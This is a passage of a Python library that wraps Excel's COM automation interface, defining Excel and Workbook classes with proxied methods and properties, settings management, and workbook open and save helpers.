SETTINGS.copy() settings.update(Excel.DEFAULT_SETTINGS) settings.update(xl_settings) try: # Get the existing excel settings xl = Excel.GLOBAL_EXCELS[settings] except (KeyError, Exception): # Create a new excel object for the settings and return the excel object is_parallel = settings.get('is_parallel', None) if is_parallel or is_parallel is None: xl = win32com.client.DispatchEx("Excel.Application") else: xl = win32com.client.Dispatch("Excel.Application") # Set the given attributes set_xl_com_settings(xl, **settings) # Save the object Excel.GLOBAL_EXCELS.append(xl) # Return the excel object return xl class Excel(object): METHOD_SETTER_ERROR = 'Cannot set property ' DEFAULT_SETTINGS = { 'DisplayAlerts': False, # If False hides prompt to save 'AutomationSecurity': 1, 'Interactive': False, 'PrintCommunication': False, } GLOBAL_EXCELS = ItemStorage(compare_func=compare_xl_com) def __new__(cls, **kwargs): obj = super().__new__(cls) obj.is_parallel = kwargs.get('is_parallel', True) obj._xl = None # Set the settings settings = SETTINGS.copy() settings.update(cls.DEFAULT_SETTINGS) settings.update(kwargs) obj._settings = settings return obj def __init__(self, **kwargs): super().__init__() if not hasattr(self, '_xl'): self._xl = None if not hasattr(self, '_settings'): settings = SETTINGS.copy() settings.update(self.DEFAULT_SETTINGS) settings.update(kwargs) self._settings = settings # Use settings to create excel application object. def get_settings(self, **settings): """Get the current settings.""" if self._xl is None: return self._settings.copy() settings = get_xl_com_settings(self, **settings) self._settings = settings.copy() # Might as well save current settings return settings def set_settings(self, **settings): """Set the given attribute settings.""" # Set the given attributes set_xl_com_settings(self, **settings) @property def xl(self): """Get (or create) the Excel Application attribute.""" if self._xl is None: # Catch SIGTERM/SIGINT to close excel safely! if should_init_sig() and len(Excel.GLOBAL_EXCELS) == 1: init_sig_shutdown() # Find or create the application using settings self._xl = get_xl_com_for_settings(**self._settings.copy()) return self._xl @xl.setter def xl(self, value): """Set the Excel Application attribute.""" if value is None: # Save settings in case of recreate try: self._settings = get_xl_com_settings(self._xl) except (AttributeError, ValueError, TypeError, Exception): pass else: self._settings = get_xl_com_settings(value) # Save the given xl com object or None. self._xl = value def __enter__(self): return self def __exit__(self, exception_type, exception_value, traceback): self.Quit() return exception_type is None # Methods Application object? https://docs.microsoft.com/en-us/office/vba/api/excel.application(object) ActivateMicrosoftApp = ProxyMethod('xl.ActivateMicrosoftApp', setter_error=METHOD_SETTER_ERROR) AddCustomList = ProxyMethod('xl.AddCustomList', setter_error=METHOD_SETTER_ERROR) Calculate = ProxyMethod('xl.Calculate', setter_error=METHOD_SETTER_ERROR) CalculateFull = ProxyMethod('xl.CalculateFull', setter_error=METHOD_SETTER_ERROR) CalculateFullRebuild = ProxyMethod('xl.CalculateFullRebuild', setter_error=METHOD_SETTER_ERROR) CalculateUntilAsyncQueriesDone = ProxyMethod('xl.CalculateUntilAsyncQueriesDone', setter_error=METHOD_SETTER_ERROR) CentimetersToPoints = ProxyMethod('xl.CentimetersToPoints', setter_error=METHOD_SETTER_ERROR) CheckAbort = ProxyMethod('xl.CheckAbort', setter_error=METHOD_SETTER_ERROR) CheckSpelling = ProxyMethod('xl.CheckSpelling', setter_error=METHOD_SETTER_ERROR) ConvertFormula = ProxyMethod('xl.ConvertFormula', setter_error=METHOD_SETTER_ERROR) DDEExecute = ProxyMethod('xl.DDEExecute', setter_error=METHOD_SETTER_ERROR) DDEInitiate = ProxyMethod('xl.DDEInitiate', setter_error=METHOD_SETTER_ERROR) DDEPoke = ProxyMethod('xl.DDEPoke', setter_error=METHOD_SETTER_ERROR) DDERequest = ProxyMethod('xl.DDERequest', setter_error=METHOD_SETTER_ERROR) DDETerminate = ProxyMethod('xl.DDETerminate', setter_error=METHOD_SETTER_ERROR) DeleteCustomList = ProxyMethod('xl.DeleteCustomList', setter_error=METHOD_SETTER_ERROR) DisplayXMLSourcePane = ProxyMethod('xl.DisplayXMLSourcePane', setter_error=METHOD_SETTER_ERROR) DoubleClick = ProxyMethod('xl.DoubleClick', setter_error=METHOD_SETTER_ERROR) Evaluate = ProxyMethod('xl.Evaluate', setter_error=METHOD_SETTER_ERROR) ExecuteExcel4Macro = ProxyMethod('xl.ExecuteExcel4Macro', setter_error=METHOD_SETTER_ERROR) FindFile = ProxyMethod('xl.FindFile', setter_error=METHOD_SETTER_ERROR) GetCustomListContents = ProxyMethod('xl.GetCustomListContents', setter_error=METHOD_SETTER_ERROR) GetCustomListNum = ProxyMethod('xl.GetCustomListNum', setter_error=METHOD_SETTER_ERROR) GetOpenFilename = ProxyMethod('xl.GetOpenFilename', setter_error=METHOD_SETTER_ERROR) GetPhonetic = ProxyMethod('xl.GetPhonetic', setter_error=METHOD_SETTER_ERROR) GetSaveAsFilename = ProxyMethod('xl.GetSaveAsFilename', setter_error=METHOD_SETTER_ERROR) Goto = ProxyMethod('xl.Goto', setter_error=METHOD_SETTER_ERROR) Help = ProxyMethod('xl.Help', setter_error=METHOD_SETTER_ERROR) InchesToPoints = ProxyMethod('xl.InchesToPoints', setter_error=METHOD_SETTER_ERROR) InputBox = ProxyMethod('xl.InputBox', setter_error=METHOD_SETTER_ERROR) Intersect = ProxyMethod('xl.Intersect', setter_error=METHOD_SETTER_ERROR) MacroOptions = ProxyMethod('xl.MacroOptions', setter_error=METHOD_SETTER_ERROR) MailLogoff = ProxyMethod('xl.MailLogoff', setter_error=METHOD_SETTER_ERROR) MailLogon = ProxyMethod('xl.MailLogon', setter_error=METHOD_SETTER_ERROR) NextLetter = ProxyMethod('xl.NextLetter', setter_error=METHOD_SETTER_ERROR) OnKey = ProxyMethod('xl.OnKey', setter_error=METHOD_SETTER_ERROR) OnRepeat = ProxyMethod('xl.OnRepeat', setter_error=METHOD_SETTER_ERROR) OnTime = ProxyMethod('xl.OnTime', setter_error=METHOD_SETTER_ERROR) OnUndo = ProxyMethod('xl.OnUndo', setter_error=METHOD_SETTER_ERROR) Quit = ProxyMethod('xl.Quit', setter_error=METHOD_SETTER_ERROR) RecordMacro = ProxyMethod('xl.RecordMacro', setter_error=METHOD_SETTER_ERROR) RegisterXLL = ProxyMethod('xl.RegisterXLL', setter_error=METHOD_SETTER_ERROR) Repeat = ProxyMethod('xl.Repeat', setter_error=METHOD_SETTER_ERROR) Run = ProxyMethod('xl.Run', setter_error=METHOD_SETTER_ERROR) SendKeys = ProxyMethod('xl.SendKeys', setter_error=METHOD_SETTER_ERROR) SharePointVersion = ProxyMethod('xl.SharePointVersion', setter_error=METHOD_SETTER_ERROR) Undo = ProxyMethod('xl.Undo', setter_error=METHOD_SETTER_ERROR) Union = ProxyMethod('xl.Union', setter_error=METHOD_SETTER_ERROR) Volatile = ProxyMethod('xl.Volatile', setter_error=METHOD_SETTER_ERROR) Wait = ProxyMethod('xl.Wait', setter_error=METHOD_SETTER_ERROR) # Properties ActiveCell = ProxyProperty('xl.ActiveCell') ActiveChart = ProxyProperty('xl.ActiveChart') ActiveEncryptionSession = ProxyProperty('xl.ActiveEncryptionSession') ActivePrinter = ProxyProperty('xl.ActivePrinter') ActiveProtectedViewWindow = ProxyProperty('xl.ActiveProtectedViewWindow') ActiveSheet = ProxyProperty('xl.ActiveSheet') ActiveWindow = ProxyProperty('xl.ActiveWindow') ActiveWorkbook = ProxyProperty('xl.ActiveWorkbook') AddIns = ProxyProperty('xl.AddIns') AddIns2 = ProxyProperty('xl.AddIns2') AlertBeforeOverwriting = ProxyProperty('xl.AlertBeforeOverwriting') AltStartupPath = ProxyProperty('xl.AltStartupPath') AlwaysUseClearType = ProxyProperty('xl.AlwaysUseClearType') Application = ProxyProperty('xl.Application') ArbitraryXMLSupportAvailable = ProxyProperty('xl.ArbitraryXMLSupportAvailable') AskToUpdateLinks = ProxyProperty('xl.AskToUpdateLinks') Assistance = ProxyProperty('xl.Assistance') AutoCorrect = ProxyProperty('xl.AutoCorrect') AutoFormatAsYouTypeReplaceHyperlinks = ProxyProperty('xl.AutoFormatAsYouTypeReplaceHyperlinks') AutomationSecurity = ProxyProperty('xl.AutomationSecurity') AutoPercentEntry = ProxyProperty('xl.AutoPercentEntry') AutoRecover = ProxyProperty('xl.AutoRecover') Build = ProxyProperty('xl.Build') CalculateBeforeSave = ProxyProperty('xl.CalculateBeforeSave') Calculation = ProxyProperty('xl.Calculation') CalculationInterruptKey = ProxyProperty('xl.CalculationInterruptKey') CalculationState = ProxyProperty('xl.CalculationState') CalculationVersion = ProxyProperty('xl.CalculationVersion') Caller = ProxyProperty('xl.Caller') CanPlaySounds = ProxyProperty('xl.CanPlaySounds') CanRecordSounds = ProxyProperty('xl.CanRecordSounds') Caption = ProxyProperty('xl.Caption') CellDragAndDrop = ProxyProperty('xl.CellDragAndDrop') Cells = ProxyProperty('xl.Cells') ChartDataPointTrack = ProxyProperty('xl.ChartDataPointTrack') Charts = ProxyProperty('xl.Charts') ClipboardFormats = ProxyProperty('xl.ClipboardFormats') ClusterConnector = ProxyProperty('xl.ClusterConnector') Columns = ProxyProperty('xl.Columns') COMAddIns = ProxyProperty('xl.COMAddIns') CommandBars = ProxyProperty('xl.CommandBars') CommandUnderlines = ProxyProperty('xl.CommandUnderlines') ConstrainNumeric = ProxyProperty('xl.ConstrainNumeric') ControlCharacters = ProxyProperty('xl.ControlCharacters') CopyObjectsWithCells = ProxyProperty('xl.CopyObjectsWithCells') Creator = ProxyProperty('xl.Creator') Cursor = ProxyProperty('xl.Cursor') CursorMovement = ProxyProperty('xl.CursorMovement') CustomListCount = ProxyProperty('xl.CustomListCount') CutCopyMode = ProxyProperty('xl.CutCopyMode') DataEntryMode = ProxyProperty('xl.DataEntryMode') DDEAppReturnCode = ProxyProperty('xl.DDEAppReturnCode') DecimalSeparator = ProxyProperty('xl.DecimalSeparator') DefaultFilePath = ProxyProperty('xl.DefaultFilePath') DefaultSaveFormat = ProxyProperty('xl.DefaultSaveFormat') DefaultSheetDirection = ProxyProperty('xl.DefaultSheetDirection') DefaultWebOptions = ProxyProperty('xl.DefaultWebOptions') DeferAsyncQueries = ProxyProperty('xl.DeferAsyncQueries') Dialogs = ProxyProperty('xl.Dialogs') DisplayAlerts = ProxyProperty('xl.DisplayAlerts') DisplayClipboardWindow = ProxyProperty('xl.DisplayClipboardWindow') DisplayCommentIndicator = ProxyProperty('xl.DisplayCommentIndicator') DisplayDocumentActionTaskPane = ProxyProperty('xl.DisplayDocumentActionTaskPane') DisplayDocumentInformationPanel = ProxyProperty('xl.DisplayDocumentInformationPanel') DisplayExcel4Menus = ProxyProperty('xl.DisplayExcel4Menus') DisplayFormulaAutoComplete = ProxyProperty('xl.DisplayFormulaAutoComplete') DisplayFormulaBar = ProxyProperty('xl.DisplayFormulaBar') DisplayFullScreen = ProxyProperty('xl.DisplayFullScreen') DisplayFunctionToolTips = ProxyProperty('xl.DisplayFunctionToolTips') DisplayInsertOptions = ProxyProperty('xl.DisplayInsertOptions') DisplayNoteIndicator = ProxyProperty('xl.DisplayNoteIndicator') DisplayPasteOptions = ProxyProperty('xl.DisplayPasteOptions') DisplayRecentFiles = ProxyProperty('xl.DisplayRecentFiles') DisplayScrollBars = ProxyProperty('xl.DisplayScrollBars') DisplayStatusBar = ProxyProperty('xl.DisplayStatusBar') EditDirectlyInCell = ProxyProperty('xl.EditDirectlyInCell') EnableAnimations = ProxyProperty('xl.EnableAnimations') EnableAutoComplete = ProxyProperty('xl.EnableAutoComplete') EnableCancelKey = ProxyProperty('xl.EnableCancelKey') EnableCheckFileExtensions = ProxyProperty('xl.EnableCheckFileExtensions') EnableEvents = ProxyProperty('xl.EnableEvents') EnableLargeOperationAlert = ProxyProperty('xl.EnableLargeOperationAlert') EnableLivePreview = ProxyProperty('xl.EnableLivePreview') EnableMacroAnimations = ProxyProperty('xl.EnableMacroAnimations') EnableSound = ProxyProperty('xl.EnableSound') ErrorCheckingOptions = ProxyProperty('xl.ErrorCheckingOptions') Excel4IntlMacroSheets = ProxyProperty('xl.Excel4IntlMacroSheets') Excel4MacroSheets = ProxyProperty('xl.Excel4MacroSheets') ExtendList = ProxyProperty('xl.ExtendList') FeatureInstall = ProxyProperty('xl.FeatureInstall') FileConverters = ProxyProperty('xl.FileConverters') FileDialog = ProxyProperty('xl.FileDialog') FileExportConverters = ProxyProperty('xl.FileExportConverters') FileValidation = ProxyProperty('xl.FileValidation') FileValidationPivot = ProxyProperty('xl.FileValidationPivot') FindFormat = ProxyProperty('xl.FindFormat') FixedDecimal = ProxyProperty('xl.FixedDecimal') FixedDecimalPlaces = ProxyProperty('xl.FixedDecimalPlaces') FlashFill = ProxyProperty('xl.FlashFill') FlashFillMode = ProxyProperty('xl.FlashFillMode') FormulaBarHeight = ProxyProperty('xl.FormulaBarHeight') GenerateGetPivotData = ProxyProperty('xl.GenerateGetPivotData') GenerateTableRefs = ProxyProperty('xl.GenerateTableRefs') Height = ProxyProperty('xl.Height') HighQualityModeForGraphics = ProxyProperty('xl.HighQualityModeForGraphics') Hinstance = ProxyProperty('xl.Hinstance') HinstancePtr = ProxyProperty('xl.HinstancePtr') Hwnd = ProxyProperty('xl.Hwnd') IgnoreRemoteRequests = ProxyProperty('xl.IgnoreRemoteRequests') Interactive = ProxyProperty('xl.Interactive') International = ProxyProperty('xl.International') IsSandboxed = ProxyProperty('xl.IsSandboxed') Iteration = ProxyProperty('xl.Iteration') LanguageSettings = ProxyProperty('xl.LanguageSettings') LargeOperationCellThousandCount = ProxyProperty('xl.LargeOperationCellThousandCount') Left = ProxyProperty('xl.Left') LibraryPath = ProxyProperty('xl.LibraryPath') MailSession = ProxyProperty('xl.MailSession') MailSystem = ProxyProperty('xl.MailSystem') MapPaperSize = ProxyProperty('xl.MapPaperSize') MathCoprocessorAvailable = ProxyProperty('xl.MathCoprocessorAvailable') MaxChange = ProxyProperty('xl.MaxChange') MaxIterations = ProxyProperty('xl.MaxIterations') MeasurementUnit = ProxyProperty('xl.MeasurementUnit') MergeInstances = ProxyProperty('xl.MergeInstances') MouseAvailable = ProxyProperty('xl.MouseAvailable') MoveAfterReturn = ProxyProperty('xl.MoveAfterReturn') MoveAfterReturnDirection = ProxyProperty('xl.MoveAfterReturnDirection') MultiThreadedCalculation = ProxyProperty('xl.MultiThreadedCalculation') Name = ProxyProperty('xl.Name') Names = ProxyProperty('xl.Names') NetworkTemplatesPath = ProxyProperty('xl.NetworkTemplatesPath') NewWorkbook = ProxyProperty('xl.NewWorkbook') ODBCErrors = ProxyProperty('xl.ODBCErrors') ODBCTimeout = ProxyProperty('xl.ODBCTimeout') OLEDBErrors = ProxyProperty('xl.OLEDBErrors') OnWindow = ProxyProperty('xl.OnWindow') OperatingSystem = ProxyProperty('xl.OperatingSystem') OrganizationName = ProxyProperty('xl.OrganizationName') Parent = ProxyProperty('xl.Parent') Path = ProxyProperty('xl.Path') PathSeparator = ProxyProperty('xl.PathSeparator') PivotTableSelection = ProxyProperty('xl.PivotTableSelection') PreviousSelections = ProxyProperty('xl.PreviousSelections') PrintCommunication = ProxyProperty('xl.PrintCommunication') ProductCode = ProxyProperty('xl.ProductCode') PromptForSummaryInfo = ProxyProperty('xl.PromptForSummaryInfo') ProtectedViewWindows = ProxyProperty('xl.ProtectedViewWindows') QuickAnalysis = ProxyProperty('xl.QuickAnalysis') Range = ProxyProperty('xl.Range') Ready = ProxyProperty('xl.Ready') RecentFiles = ProxyProperty('xl.RecentFiles') RecordRelative = ProxyProperty('xl.RecordRelative') ReferenceStyle = ProxyProperty('xl.ReferenceStyle') RegisteredFunctions = ProxyProperty('xl.RegisteredFunctions') ReplaceFormat = ProxyProperty('xl.ReplaceFormat') RollZoom = ProxyProperty('xl.RollZoom') Rows = ProxyProperty('xl.Rows') RTD = ProxyProperty('xl.RTD') ScreenUpdating = ProxyProperty('xl.ScreenUpdating') Selection = ProxyProperty('xl.Selection') Sheets = ProxyProperty('xl.Sheets') SheetsInNewWorkbook = ProxyProperty('xl.SheetsInNewWorkbook') ShowChartTipNames = ProxyProperty('xl.ShowChartTipNames') ShowChartTipValues = ProxyProperty('xl.ShowChartTipValues') ShowDevTools = ProxyProperty('xl.ShowDevTools') ShowMenuFloaties = ProxyProperty('xl.ShowMenuFloaties') ShowQuickAnalysis = ProxyProperty('xl.ShowQuickAnalysis') ShowSelectionFloaties = ProxyProperty('xl.ShowSelectionFloaties') ShowStartupDialog = ProxyProperty('xl.ShowStartupDialog') ShowToolTips = ProxyProperty('xl.ShowToolTips') SmartArtColors = ProxyProperty('xl.SmartArtColors') SmartArtLayouts = ProxyProperty('xl.SmartArtLayouts') SmartArtQuickStyles = ProxyProperty('xl.SmartArtQuickStyles') Speech = ProxyProperty('xl.Speech') SpellingOptions = ProxyProperty('xl.SpellingOptions') StandardFont = ProxyProperty('xl.StandardFont') StandardFontSize = ProxyProperty('xl.StandardFontSize') StartupPath = ProxyProperty('xl.StartupPath') StatusBar = ProxyProperty('xl.StatusBar') TemplatesPath = ProxyProperty('xl.TemplatesPath') ThisCell = ProxyProperty('xl.ThisCell') ThisWorkbook = ProxyProperty('xl.ThisWorkbook') ThousandsSeparator = ProxyProperty('xl.ThousandsSeparator') Top = ProxyProperty('xl.Top') TransitionMenuKey = ProxyProperty('xl.TransitionMenuKey') TransitionMenuKeyAction = ProxyProperty('xl.TransitionMenuKeyAction') TransitionNavigKeys = ProxyProperty('xl.TransitionNavigKeys') UsableHeight = ProxyProperty('xl.UsableHeight') UsableWidth = ProxyProperty('xl.UsableWidth') UseClusterConnector = ProxyProperty('xl.UseClusterConnector') UsedObjects = ProxyProperty('xl.UsedObjects') UserControl = ProxyProperty('xl.UserControl') UserLibraryPath = ProxyProperty('xl.UserLibraryPath') UserName = ProxyProperty('xl.UserName') UseSystemSeparators = ProxyProperty('xl.UseSystemSeparators') Value = ProxyProperty('xl.Value') VBE = ProxyProperty('xl.VBE') Version = ProxyProperty('xl.Version') Visible = ProxyProperty('xl.Visible') WarnOnFunctionNameConflict = ProxyProperty('xl.WarnOnFunctionNameConflict') Watches = ProxyProperty('xl.Watches') Width = ProxyProperty('xl.Width') Windows = ProxyProperty('xl.Windows') WindowsForPens = ProxyProperty('xl.WindowsForPens') WindowState = ProxyProperty('xl.WindowState') Workbooks = ProxyProperty('xl.Workbooks') WorksheetFunction = ProxyProperty('xl.WorksheetFunction') Worksheets = ProxyProperty('xl.Worksheets') class Workbook(object): METHOD_SETTER_ERROR = 'Cannot set property ' SAVE_ON_CLOSE = False def __init__(self, filename=None, *args, xl=None, wb=None, **xl_settings): # Variables self._xl = xl self._wb = wb self._filename = None # Save the filename as a variable # Initialize Excel if self._xl is None: self._xl = Excel(**xl_settings) # Set the filename self.set_filename(filename) # Check to open the filename if isinstance(self.filename, str) and os.path.exists(self.filename) and os.path.isfile(self.filename): self.open(filename) # Initialize constants self.init_constants() def init_constants(self): """Set all of the constant values.""" for k, field in self.__class__.__dict__.items(): if isinstance(field, ConstantItem): field.init_table(self) @property def xl(self): """Get (or create) the Excel Application object.""" if self._xl is None: self._xl = Excel() return self._xl @xl.setter def xl(self, value): """Set the Excel Application object.""" self._xl = value @property def wb(self): """Get (or Add) a Workbook to the Excel Application Workbooks collection.""" if self._wb is None: self._wb = self.xl.Workbooks.Add() return self._wb @wb.setter def wb(self, value): """Set the Workbook object.""" try: self._wb.Close(self.SAVE_ON_CLOSE) except (AttributeError, Exception): pass self._wb = value def get_filename(self): """Return the filename.""" return self._filename def set_filename(self, filename): """Set the filename. Args: filename (str/object): Filename to save and open from. """ if isinstance(filename, str): filename = os.path.abspath(filename) self._filename = filename filename = property(get_filename, set_filename) def open(self, filename=None): """Open a workbook with the given filename and use this workbook.""" if filename is not None: self.set_filename(filename) filename = self.get_filename() if isinstance(filename, str) and os.path.exists(filename) and os.path.isfile(filename): self._wb = self.xl.Workbooks.Open(filename) return self EXT_TO_FMT = { # Lower case extension to Format '.xla': win32com.client.constants.xlAddIn, '.csv': win32com.client.constants.xlCSV, '.txt': win32com.client.constants.xlCurrentPlatformText, '.dbf': win32com.client.constants.xlDBF4, '.dif': win32com.client.constants.xlDIF, '.xlsb': win32com.client.constants.xlExcel12, # '.xls': win32com.client.constants.xlExcel8, '.htm': win32com.client.constants.xlHtml, '.html': win32com.client.constants.xlHtml, '.ods': win32com.client.constants.xlOpenDocumentSpreadsheet, '.xlam': win32com.client.constants.xlOpenXMLAddIn, '.xltx': win32com.client.constants.xlOpenXMLTemplate, # win32com.client.constants.xlTemplate, '.xlsm': win32com.client.constants.xlOpenXMLWorkbookMacroEnabled, '.slk': win32com.client.constants.xlSYLK, '.xlt': win32com.client.constants.xlTemplate, '.prn': win32com.client.constants.xlTextPrinter, '.mht': win32com.client.constants.xlWebArchive, '.mhtml': win32com.client.constants.xlWebArchive, '.wj2': win32com.client.constants.xlWJ2WD1, '.wj3': win32com.client.constants.xlWJ3FJ3, '.wk1': win32com.client.constants.xlWK3FM3, '.wk3': win32com.client.constants.xlWK3, '.wk4': win32com.client.constants.xlWK4, '.wks': win32com.client.constants.xlWKS, '.xlsx': win32com.client.constants.xlWorkbookDefault, '.xls': win32com.client.constants.xlWorkbookNormal, '.wq1': win32com.client.constants.xlWQ1, '.xml': win32com.client.constants.xlXMLSpreadsheet, } def save(self, filename=None): """Save the given filename or set filename.""" if filename is not None: self.set_filename(filename) filename = self.get_filename() ext = os.path.splitext(filename)[-1].lower() file_fmt = self.EXT_TO_FMT.get(ext, None) # Saving as CSV or non excel type renames the active sheet to the base filename. sheet_name = self.wb.ActiveSheet.Name self.wb.SaveAs(filename, file_fmt) self.wb.ActiveSheet.Name = sheet_name def get_sheet(self, sheet, create=True): """Return the sheet for an index or name.""" if isinstance(sheet, int): sheet = 'Sheet'+str(sheet) try: obj = self.wb.Sheets(sheet) # Get the sheet obj.Activate() except (ValueError, TypeError, Exception): if create: obj = self.wb.Sheets.Add() # Create the sheet obj.Name = sheet else: obj = None return obj def has_sheet(self, sheet): """Return if the given sheet name or index exists""" return self.get_sheet(sheet, create=False) is not None # ===== Workbook Object Methods ===== https://docs.microsoft.com/en-us/office/vba/api/excel.workbook#methods AcceptAllChanges = ProxyMethod('wb.AcceptAllChanges', setter_error=METHOD_SETTER_ERROR) Activate = ProxyMethod('wb.Activate', setter_error=METHOD_SETTER_ERROR) AddToFavorites = ProxyMethod('wb.AddToFavorites', setter_error=METHOD_SETTER_ERROR) ApplyTheme = ProxyMethod('wb.ApplyTheme', setter_error=METHOD_SETTER_ERROR) BreakLink = ProxyMethod('wb.BreakLink', setter_error=METHOD_SETTER_ERROR) CanCheckIn = ProxyMethod('wb.CanCheckIn', setter_error=METHOD_SETTER_ERROR) ChangeFileAccess = ProxyMethod('wb.ChangeFileAccess', setter_error=METHOD_SETTER_ERROR) ChangeLink = ProxyMethod('wb.ChangeLink', setter_error=METHOD_SETTER_ERROR) CheckIn = ProxyMethod('wb.CheckIn', setter_error=METHOD_SETTER_ERROR) CheckInWithVersion = ProxyMethod('wb.CheckInWithVersion', setter_error=METHOD_SETTER_ERROR) Close = ProxyMethod('wb.Close', setter_error=METHOD_SETTER_ERROR) ConvertComments = ProxyMethod('wb.ConvertComments', setter_error=METHOD_SETTER_ERROR) CreateForecastSheet = ProxyMethod('wb.CreateForecastSheet', setter_error=METHOD_SETTER_ERROR) DeleteNumberFormat = ProxyMethod('wb.DeleteNumberFormat', setter_error=METHOD_SETTER_ERROR) EnableConnections = ProxyMethod('wb.EnableConnections', setter_error=METHOD_SETTER_ERROR) EndReview = ProxyMethod('wb.EndReview', setter_error=METHOD_SETTER_ERROR) ExclusiveAccess = ProxyMethod('wb.ExclusiveAccess', setter_error=METHOD_SETTER_ERROR) ExportAsFixedFormat = ProxyMethod('wb.ExportAsFixedFormat', setter_error=METHOD_SETTER_ERROR) FollowHyperlink = ProxyMethod('wb.FollowHyperlink', setter_error=METHOD_SETTER_ERROR) ForwardMailer = ProxyMethod('wb.ForwardMailer', setter_error=METHOD_SETTER_ERROR) GetWorkflowTasks = ProxyMethod('wb.GetWorkflowTasks', setter_error=METHOD_SETTER_ERROR) GetWorkflowTemplates = ProxyMethod('wb.GetWorkflowTemplates', setter_error=METHOD_SETTER_ERROR) HighlightChangesOptions = ProxyMethod('wb.HighlightChangesOptions', setter_error=METHOD_SETTER_ERROR) LinkInfo = ProxyMethod('wb.LinkInfo', setter_error=METHOD_SETTER_ERROR) LinkSources = ProxyMethod('wb.LinkSources', setter_error=METHOD_SETTER_ERROR) LockServerFile = ProxyMethod('wb.LockServerFile', setter_error=METHOD_SETTER_ERROR) MergeWorkbook = ProxyMethod('wb.MergeWorkbook', setter_error=METHOD_SETTER_ERROR) NewWindow = ProxyMethod('wb.NewWindow', setter_error=METHOD_SETTER_ERROR) OpenLinks = ProxyMethod('wb.OpenLinks', setter_error=METHOD_SETTER_ERROR) PivotCaches = ProxyMethod('wb.PivotCaches', setter_error=METHOD_SETTER_ERROR) Post = ProxyMethod('wb.Post', setter_error=METHOD_SETTER_ERROR) PrintOut = ProxyMethod('wb.PrintOut', setter_error=METHOD_SETTER_ERROR) PrintPreview = ProxyMethod('wb.PrintPreview', setter_error=METHOD_SETTER_ERROR) Protect = ProxyMethod('wb.Protect', setter_error=METHOD_SETTER_ERROR) ProtectSharing = ProxyMethod('wb.ProtectSharing', setter_error=METHOD_SETTER_ERROR) PublishToDocs = ProxyMethod('wb.PublishToDocs', setter_error=METHOD_SETTER_ERROR) PurgeChangeHistoryNow = ProxyMethod('wb.PurgeChangeHistoryNow', setter_error=METHOD_SETTER_ERROR) RefreshAll = ProxyMethod('wb.RefreshAll', setter_error=METHOD_SETTER_ERROR) RejectAllChanges = ProxyMethod('wb.RejectAllChanges', setter_error=METHOD_SETTER_ERROR) ReloadAs = ProxyMethod('wb.ReloadAs', setter_error=METHOD_SETTER_ERROR) RemoveDocumentInformation = ProxyMethod('wb.RemoveDocumentInformation', setter_error=METHOD_SETTER_ERROR) RemoveUser = ProxyMethod('wb.RemoveUser', setter_error=METHOD_SETTER_ERROR) Reply = ProxyMethod('wb.Reply', setter_error=METHOD_SETTER_ERROR) ReplyAll = ProxyMethod('wb.ReplyAll', setter_error=METHOD_SETTER_ERROR) ReplyWithChanges = ProxyMethod('wb.ReplyWithChanges', setter_error=METHOD_SETTER_ERROR) ResetColors = ProxyMethod('wb.ResetColors', setter_error=METHOD_SETTER_ERROR) RunAutoMacros = ProxyMethod('wb.RunAutoMacros', setter_error=METHOD_SETTER_ERROR) Save = ProxyMethod('wb.Save', setter_error=METHOD_SETTER_ERROR) SaveAs = ProxyMethod('wb.SaveAs', setter_error=METHOD_SETTER_ERROR) SaveAsXMLData = ProxyMethod('wb.SaveAsXMLData', setter_error=METHOD_SETTER_ERROR) SaveCopyAs = ProxyMethod('wb.SaveCopyAs', setter_error=METHOD_SETTER_ERROR) SendFaxOverInternet = ProxyMethod('wb.SendFaxOverInternet', setter_error=METHOD_SETTER_ERROR) SendForReview = ProxyMethod('wb.SendForReview', setter_error=METHOD_SETTER_ERROR) SendMail = ProxyMethod('wb.SendMail', setter_error=METHOD_SETTER_ERROR) SendMailer = ProxyMethod('wb.SendMailer', setter_error=METHOD_SETTER_ERROR) SetLinkOnData = ProxyMethod('wb.SetLinkOnData', setter_error=METHOD_SETTER_ERROR) SetPasswordEncryptionOptions = ProxyMethod('wb.SetPasswordEncryptionOptions', setter_error=METHOD_SETTER_ERROR) ToggleFormsDesign = ProxyMethod('wb.ToggleFormsDesign', setter_error=METHOD_SETTER_ERROR) Unprotect = ProxyMethod('wb.Unprotect', setter_error=METHOD_SETTER_ERROR) UnprotectSharing = ProxyMethod('wb.UnprotectSharing', setter_error=METHOD_SETTER_ERROR) UpdateFromFile = ProxyMethod('wb.UpdateFromFile', setter_error=METHOD_SETTER_ERROR) UpdateLink = ProxyMethod('wb.UpdateLink', setter_error=METHOD_SETTER_ERROR) WebPagePreview = ProxyMethod('wb.WebPagePreview', setter_error=METHOD_SETTER_ERROR) XmlImport = ProxyMethod('wb.XmlImport', setter_error=METHOD_SETTER_ERROR) XmlImportXml = ProxyMethod('wb.XmlImportXml', setter_error=METHOD_SETTER_ERROR) # ===== Workbook Object Properties ===== https://docs.microsoft.com/en-us/office/vba/api/excel.workbook#properties AccuracyVersion = ProxyProperty('wb.AccuracyVersion') ActiveChart = ProxyProperty('wb.ActiveChart') ActiveSheet = ProxyProperty('wb.ActiveSheet') ActiveSlicer = ProxyProperty('wb.ActiveSlicer') Application = ProxyProperty('wb.Application') AutoSaveOn = ProxyProperty('wb.AutoSaveOn') AutoUpdateFrequency = ProxyProperty('wb.AutoUpdateFrequency') AutoUpdateSaveChanges = ProxyProperty('wb.AutoUpdateSaveChanges') BuiltinDocumentProperties = ProxyProperty('wb.BuiltinDocumentProperties') CalculationVersion = ProxyProperty('wb.CalculationVersion') CaseSensitive = ProxyProperty('wb.CaseSensitive') ChangeHistoryDuration = ProxyProperty('wb.ChangeHistoryDuration') ChartDataPointTrack = ProxyProperty('wb.ChartDataPointTrack') Charts = ProxyProperty('wb.Charts') CheckCompatibility = ProxyProperty('wb.CheckCompatibility') CodeName = ProxyProperty('wb.CodeName') Colors = ProxyProperty('wb.Colors') CommandBars = ProxyProperty('wb.CommandBars') ConflictResolution = ProxyProperty('wb.ConflictResolution') Connections = ProxyProperty('wb.Connections') ConnectionsDisabled = ProxyProperty('wb.ConnectionsDisabled') Container = ProxyProperty('wb.Container') ContentTypeProperties = ProxyProperty('wb.ContentTypeProperties') CreateBackup = ProxyProperty('wb.CreateBackup') Creator = ProxyProperty('wb.Creator') CustomDocumentProperties = ProxyProperty('wb.CustomDocumentProperties') CustomViews = ProxyProperty('wb.CustomViews') CustomXMLParts = ProxyProperty('wb.CustomXMLParts') Date1904 = ProxyProperty('wb.Date1904') DefaultPivotTableStyle = ProxyProperty('wb.DefaultPivotTableStyle') DefaultSlicerStyle = ProxyProperty('wb.DefaultSlicerStyle') 